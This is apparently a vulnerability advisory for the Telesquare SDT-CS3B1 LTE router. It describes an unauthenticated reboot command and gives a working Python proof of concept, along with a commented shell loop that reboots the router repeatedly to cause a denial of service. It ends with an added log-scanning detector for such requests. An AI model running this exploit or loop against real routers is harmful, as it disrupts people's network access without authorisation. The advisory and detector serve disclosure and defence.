### Summary

The SDT-CS3B1 is an LTE router product based on SKT 3G and 4G LTE wireless communication.

### Description

The router allows unauthenticated execution of the reboot command. Attackers can exploit this issue to cause a denial of service.

`/lte/lteuicc.shtml`:

```
function RebootRequest()
{
    var url = "../cgi-bin/lte.cgi?";
    var param = "Command=Reboot";
    XHRPost(RebootHandle, url, param, false ); //sync call
}
```

### Vendor

Telesquare Co., Ltd. - http://www.telesquare.co.kr

### Affected Version

* FwVer: SDT-CS3B1, sw version 1.2.0
* LteVer: ML300S5XEA41_090 1 0.1.0
* Modem model: PM-L300S

### Tested On

* lighttpd/1.4.20

### PoC

```
import sys, requests

# Both <ip> and <port> are required
if len(sys.argv) < 3:
    print('SKT LTE Router SDT-CS3B1 Remote Reboot')
    print('Usage: b00t.py <ip> <port>\n')
    quit()

ip = sys.argv[1]
port = sys.argv[2]

# No credentials or session are sent with the request
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print r.content
#if in r.content: <xml></xml>, reboot true.
print("Router rebooted.")
```
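For detection, the following is an added example (not part of the original advisory or the vendor's code) that scans web access logs for reboot requests to `lte.cgi` made without an authenticated user. It assumes the logs use lighttpd's default `mod_accesslog` layout and that the `%u` field is `-` for unauthenticated requests; the function name, finding labels and sample lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote

# Assumed log layout (lighttpd mod_accesslog default):
#   %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Assumption: %u is "-" only when no authenticated user made the request.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^\s"]+)[^"]*" (?P<status>\d{3}) '
)

def find_unauth_reboots(lines):
    """Return (client, time, method, kind) for unauthenticated lte.cgi requests.

    kind is "reboot" when Command=Reboot is visible in the query string, and
    "post-unknown" for a POST, whose body parameters are not in the access log.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if m is None or m["user"] != "-":
            continue
        raw_path, _, raw_query = m["target"].partition("?")
        # Normalise "../" segments and percent-encoding before comparing.
        path = "/" + posixpath.normpath(unquote(raw_path)).lstrip("/")
        if path.lower() != "/cgi-bin/lte.cgi":
            continue
        query = {k.lower(): v.lower() for k, v in parse_qsl(raw_query)}
        if query.get("command") == "reboot":
            kind = "reboot"
        elif m["method"] == "POST" and "command" not in query:
            kind = "post-unknown"
        else:
            continue
        findings.append((m["client"], m["time"], m["method"], kind))
    return findings

# Constructed sample lines using documentation addresses, not from a real device.
SAMPLE_LOG = [
    '198.51.100.7 192.0.2.1 - [12/Mar/2024:10:00:01 +0000] "GET /cgi-bin/lte.cgi?Command=Reboot HTTP/1.1" 200 21 "-" "python-requests/2.31.0"',
    '192.0.2.50 192.0.2.1 admin [12/Mar/2024:10:00:20 +0000] "GET /cgi-bin/lte.cgi?Command=Reboot HTTP/1.1" 200 21 "-" "Mozilla/5.0"',
    '198.51.100.7 192.0.2.1 - [12/Mar/2024:10:00:40 +0000] "POST /cgi-bin/lte.cgi? HTTP/1.1" 200 21 "http://192.0.2.1/lte/lteuicc.shtml" "Mozilla/5.0"',
    '203.0.113.9 192.0.2.1 - [12/Mar/2024:10:01:00 +0000] "GET /lte/../cgi-bin/lte.cgi?command=reboot HTTP/1.1" 200 21 "-" "curl/8.0"',
    '203.0.113.9 192.0.2.1 - [12/Mar/2024:10:01:05 +0000] "GET /cgi-bin/lte.cgi?Command=Status HTTP/1.1" 200 90 "-" "curl/8.0"',
    '192.0.2.50 192.0.2.1 - [12/Mar/2024:10:01:10 +0000] "GET /index.shtml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_unauth_reboots(SAMPLE_LOG):
        print(*finding)
```

Repeated `reboot` findings from one client at short intervals match the looped use noted in the PoC comment. `post-unknown` entries need correlation with device uptime, since the command name is not logged for POST requests.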